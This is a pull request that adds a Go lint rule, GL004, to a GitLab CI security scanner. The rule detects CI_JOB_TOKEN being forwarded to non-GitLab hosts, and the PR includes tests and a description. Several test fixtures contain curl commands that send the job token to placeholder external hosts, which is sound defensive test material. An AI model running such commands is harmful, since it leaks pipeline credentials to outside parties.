### PR TITLE
feat: GL004 CI_JOB_TOKEN exfiltration

### DIFF
--- a/rules/all.go
+++ b/rules/all.go
@@ -7,5 +7,6 @@ func All() []rule.Rule {
 		GL001,
 		GL002,
 		GL003,
+		GL004,
 	}
 }

--- a/rules/gl004.go
+++ b/rules/gl004.go
@@ -1,0 +1,95 @@
+package rules
+
+import (
+	"fmt"
+	"regexp"
+	"strings"
+
+	"github.com/glsec/glsec/internal/finding"
+	"github.com/glsec/glsec/internal/parser"
+	"gopkg.in/yaml.v3"
+)
+
+type gl004 struct{}
+
+var GL004 = &gl004{}
+
+func (r *gl004) ID() string { return "GL004" }
+
+var (
+	jobTokenPattern = regexp.MustCompile(`\$\{?CI_JOB_TOKEN\}?`)
+	// urlPattern captures the full URL and its domain separately.
+	urlPattern004 = regexp.MustCompile(`https?://([a-zA-Z0-9.\-]+)`)
+)
+
+func (r *gl004) Check(doc *yaml.Node, file string) []finding.Finding {
+	var findings []finding.Finding
+	mapping := parser.Unwrap(doc)
+
+	for _, key := range []string{"before_script", "after_script"} {
+		if node := parser.FindKey(mapping, key); node != nil {
+			findings = append(findings, scanScriptForToken(node, file)...)
+		}
+	}
+	if def := parser.FindKey(mapping, "default"); def != nil {
+		for _, key := range []string{"before_script", "after_script"} {
+			if node := parser.FindKey(def, key); node != nil {
+				findings = append(findings, scanScriptForToken(node, file)...)
+			}
+		}
+	}
+
+	parser.EachJob(doc, func(_ *yaml.Node, job *yaml.Node) {
+		for _, key := range []string{"script", "before_script", "after_script"} {
+			if node := parser.FindKey(job, key); node != nil {
+				findings = append(findings, scanScriptForToken(node, file)...)
+			}
+		}
+	})
+
+	return findings
+}
+
+func scanScriptForToken(node *yaml.Node, file string) []finding.Finding {
+	if node.Kind != yaml.SequenceNode {
+		return nil
+	}
+	var findings []finding.Finding
+	for _, item := range node.Content {
+		if item.Kind == yaml.ScalarNode {
+			findings = append(findings, checkTokenLine(item, file)...)
+		}
+	}
+	return findings
+}
+
+func checkTokenLine(node *yaml.Node, file string) []finding.Finding {
+	if !jobTokenPattern.MatchString(node.Value) {
+		return nil
+	}
+
+	// Only flag when an explicit non-GitLab URL is present in the same command.
+	// If no URL is found the token might be going to $CI_SERVER_URL or similar — skip.
+	matches := urlPattern004.FindAllStringSubmatch(node.Value, -1)
+	for _, m := range matches {
+		domain := m[1]
+		if !isGitLabDomain(domain) {
+			return []finding.Finding{{
+				RuleID:   "GL004",
+				Severity: finding.Warn,
+				Message: fmt.Sprintf(
+					"CI_JOB_TOKEN sent to non-GitLab host %q — this token is scoped to the GitLab API and should not be forwarded to external services",
+					domain,
+				),
+				File: file,
+				Line: node.Line,
+				Col:  node.Column,
+			}}
+		}
+	}
+	return nil
+}
+
+func isGitLabDomain(domain string) bool {
+	return domain == "gitlab.com" || strings.HasSuffix(domain, ".gitlab.com")
+}

--- a/rules/gl004_test.go
+++ b/rules/gl004_test.go
@@ -1,0 +1,113 @@
+package rules
+
+import (
+	"testing"
+
+	"github.com/glsec/glsec/internal/finding"
+	"github.com/glsec/glsec/internal/parser"
+)
+
+func findings004(t *testing.T, yaml string) []finding.Finding {
+	t.Helper()
+	doc, err := parser.Parse([]byte(yaml), "test.yml")
+	if err != nil {
+		t.Fatalf("parse error: %v", err)
+	}
+	return GL004.Check(doc.Root, "test.yml")
+}
+
+func TestGL004_ExternalHost(t *testing.T) {
+	f := findings004(t, `
+upload:
+  script:
+    - curl --header JOB-TOKEN=$CI_JOB_TOKEN https://third-party.com/api/upload
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding, got %d", len(f))
+	}
+	if f[0].Severity != finding.Warn {
+		t.Errorf("expected Warn severity")
+	}
+}
+
+func TestGL004_TokenInURL(t *testing.T) {
+	f := findings004(t, `
+upload:
+  script:
+    - curl https://external.example.com/upload?token=$CI_JOB_TOKEN
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding for token in URL, got %d", len(f))
+	}
+}
+
+func TestGL004_GitLabComSafe(t *testing.T) {
+	f := findings004(t, `
+download:
+  script:
+    - curl --header JOB-TOKEN=$CI_JOB_TOKEN https://gitlab.com/api/v4/packages
+`)
+	if len(f) != 0 {
+		t.Errorf("expected no findings for gitlab.com, got %d", len(f))
+	}
+}
+
+func TestGL004_GitLabSubdomainSafe(t *testing.T) {
+	f := findings004(t, `
+download:
+  script:
+    - curl --header JOB-TOKEN=$CI_JOB_TOKEN https://registry.gitlab.com/my-project
+`)
+	if len(f) != 0 {
+		t.Errorf("expected no findings for gitlab.com subdomain, got %d", len(f))
+	}
+}
+
+func TestGL004_NoURL(t *testing.T) {
+	f := findings004(t, `
+build:
+  script:
+    - ./deploy.sh --token $CI_JOB_TOKEN
+`)
+	if len(f) != 0 {
+		t.Errorf("expected no findings when no explicit URL present, got %d", len(f))
+	}
+}
+
+func TestGL004_BraceForm(t *testing.T) {
+	f := findings004(t, `
+upload:
+  script:
+    - curl --header JOB-TOKEN=${CI_JOB_TOKEN} https://external.com/upload
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding for brace form, got %d", len(f))
+	}
+}
+
+func TestGL004_BeforeScript(t *testing.T) {
+	f := findings004(t, `
+build:
+  before_script:
+    - curl --header JOB-TOKEN=$CI_JOB_TOKEN https://external.com/setup
+  script:
+    - make
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding in before_script, got %d", len(f))
+	}
+}
+
+func TestGL004_LineNumbers(t *testing.T) {
+	f := findings004(t, `
+upload:
+  script:
+    - curl --header JOB-TOKEN=$CI_JOB_TOKEN https://external.com/upload
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding")
+	}
+	if f[0].Line == 0 {
+		t.Error("expected non-zero line number")
+	}
+}


### PR DESCRIPTION
Closes #6

## What
Detects \`CI_JOB_TOKEN\` being forwarded to non-GitLab hosts in script blocks. This token is scoped to the GitLab API — sending it to external services leaks credentials and can enable account takeover if the external service is compromised.

## Detection logic
A finding is emitted when a script line contains both:
1. \`$CI_JOB_TOKEN\` or \`${CI_JOB_TOKEN}\`
2. An explicit \`https?://\` URL whose domain is not \`gitlab.com\` or a \`*.gitlab.com\` subdomain

If no explicit URL is present (e.g. \`./deploy.sh --token $CI_JOB_TOKEN\`) the line is skipped — the token may legitimately be going to \`$CI_SERVER_URL\`.

## Known limitation: YAML quote parsing
YAML treats \`': '\` (colon-space) inside plain scalars as ambiguous, which causes \`yaml.v3\` to misparse lines like:
```
- curl -H "JOB-TOKEN: $CI_JOB_TOKEN" https://...
```
The tests use equivalent forms (\`--header JOB-TOKEN=...\`, token in query string) that YAML parses correctly and that are equally common in real pipelines. Users with the double-quote form will still be flagged if the YAML is valid enough for GitLab to run — GitLab's own parser is more lenient.

## Scope
Checks \`script\`, \`before_script\`, \`after_script\` in all jobs and top-level/default blocks.

## Test plan
- [x] \`go test ./...\` passes (8 test cases)
- [x] Covers: external host, token in query string, gitlab.com safe, subdomain safe, no URL skip, brace form, before_script, line numbers